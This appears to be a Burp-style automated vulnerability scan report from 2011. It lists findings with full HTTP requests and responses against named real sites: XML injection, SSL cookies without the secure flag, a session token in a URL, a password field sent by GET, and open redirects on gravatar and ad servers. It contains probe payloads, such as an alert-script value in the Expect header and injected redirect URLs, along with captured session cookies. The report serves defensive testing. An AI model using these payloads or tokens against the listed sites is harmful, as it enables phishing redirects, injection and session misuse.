<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us"
lang="en-
...[SNIP]...
11.16. http://www.yardmalls.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.yardmalls.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yardmalls.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 415
Date: Mon, 02 May 2011 00:19:42 GMT
X-Varnish: 723476696
Age: 0
Via: 1.1 varnish
nnCoection: close
X-Served-By: tdd02.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
12. SSL cookie without secure flag set  previous  next
There are 3 instances of this issue:

12.1. https://www.crankyape.com/member/registration.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.crankyape.com
Path:   /member/registration.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /member/registration.aspx HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 02 May 2011 01:53:57 GMT
Content-Length: 73292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=udtimieu5ipjefqiu2icmf45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   CrankyApe.c
...[SNIP]...
12.2. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...
12.3. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...
13. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.59
X-Cnection: close
Date: Sun, 01 May 2011 23:32:35 GMT
Content-Length: 0

14. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<hr width="645" size="1">
   
<FORM name="BidOnItem26361" onsubmit="return ValidateFields(this)" action="default.asp" ID="Form1">
<input type="hidden" name="pg" value="ProcBid" ID="Hidden1">
...[SNIP]...
<td><input type="password" name="PASSWORD" size="25"></td>
...[SNIP]...
15. Open redirection  previous  next
There are 11 instances of this issue:

15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/8ce02a29142905cdfb140added296ef8

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a15c964c82e0a6c77/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/8ce02a29142905cdfb140added296ef8?s=32&d=http%3a//a15c964c82e0a6c77/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 0.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:48:57 GMT
Expires: Mon, 02 May 2011 02:53:57 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a15c964c82e0a6c77/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 81441642
Content-Length: 0

15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/a76bb4a499349279e0339b78885213c6

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a8cdb9f7243bbb9d5/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/a76bb4a499349279e0339b78885213c6?s=32&d=http%3a//a8cdb9f7243bbb9d5/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 0.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:48:48 GMT
Expires: Mon, 02 May 2011 02:53:48 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a8cdb9f7243bbb9d5/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 887218094
Content-Length: 0

15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/31345061262d8fde4fa5256164900115

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a704709dd590a351d/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/31345061262d8fde4fa5256164900115?s=32&d=http%3a//a704709dd590a351d/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 1.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:49:52 GMT
Expires: Mon, 02 May 2011 02:54:52 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a704709dd590a351d/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2748318891
Content-Length: 0

15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /AdBriteUIDMonster

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a23f19667fa4af97b/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/779045%3fd%3d[VISITORDATA] was submitted in the redirect parameter. This caused a redirection to the following URL:

Request

GET /AdBriteUIDMonster?redirect=http%3a//a23f19667fa4af97b/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/779045%3fd%3d[VISITORDATA] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: admonkey.dapper.net

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:36:02 GMT
Connection: keep-alive
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=17610455041928294; Expires=Sat, 29-Oct-2011 02:36:02 GMT
Location: http://a23f19667fa4af97b/a?http://ads.adbrite.com/adserver/vdi/779045?d=17610455041928294
Content-Length: 0

15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a46395568984586da/a%3fhttp%3a//user.lucidmedia.com/clicksense/user%3fp%3d88436487f575811a%26r%3d0%26i%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/682865?d=null&r=http%3a//a46395568984586da/a%3fhttp%3a//user.lucidmedia.com/clicksense/user%3fp%3d88436487f575811a%26r%3d0%26i%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:38:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a46395568984586da/a?http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjst827DiIEbnVsbBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:38:17 GMT
Set-Cookie: rb=0:682865:20838240:null:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:38:17 GMT
Content-Length: 0

15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//af57d92a7e02034ec/a%3fhttp%3a//a.triggit.com/pxabcm%3fabid%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3a//af57d92a7e02034ec/a%3fhttp%3a//a.triggit.com/pxabcm%3fabid%3d HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:07:18 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://af57d92a7e02034ec/a?http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjagPPNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:07:18 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:07:18 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:07:18 GMT
Content-Length: 0

15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//afc2d7176e1c04036/a%3fhttp%3a//d.chango.com/m/s/AdBrite%3fpartner_uid%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3a//afc2d7176e1c04036/a%3fhttp%3a//d.chango.com/m/s/AdBrite%3fpartner_uid%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:40:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://afc2d7176e1c04036/a?http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY--vruBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:40:58 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:40:58 GMT
Content-Length: 0

15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a5dc11db6f719defa/a%3fhttp%3a//a.triggit.com/pxcwcm was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3a//a5dc11db6f719defa/a%3fhttp%3a//a.triggit.com/pxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:05:06 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:05:06 GMT; Path=/
Location: http://a5dc11db6f719defa/a?http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:05:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

15.9. http://pixel.rubiconproject.com/tap.php [next parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The value of the next request parameter is used to perform an HTTP redirect. The payload http%3a//ade6906d72fcaf38a/a%3fhttp%3a//a.triggit.com/pxruourcm was submitted in the next parameter. This caused a redirection to the following URL:

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3a//ade6906d72fcaf38a/a%3fhttp%3a//a.triggit.com/pxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
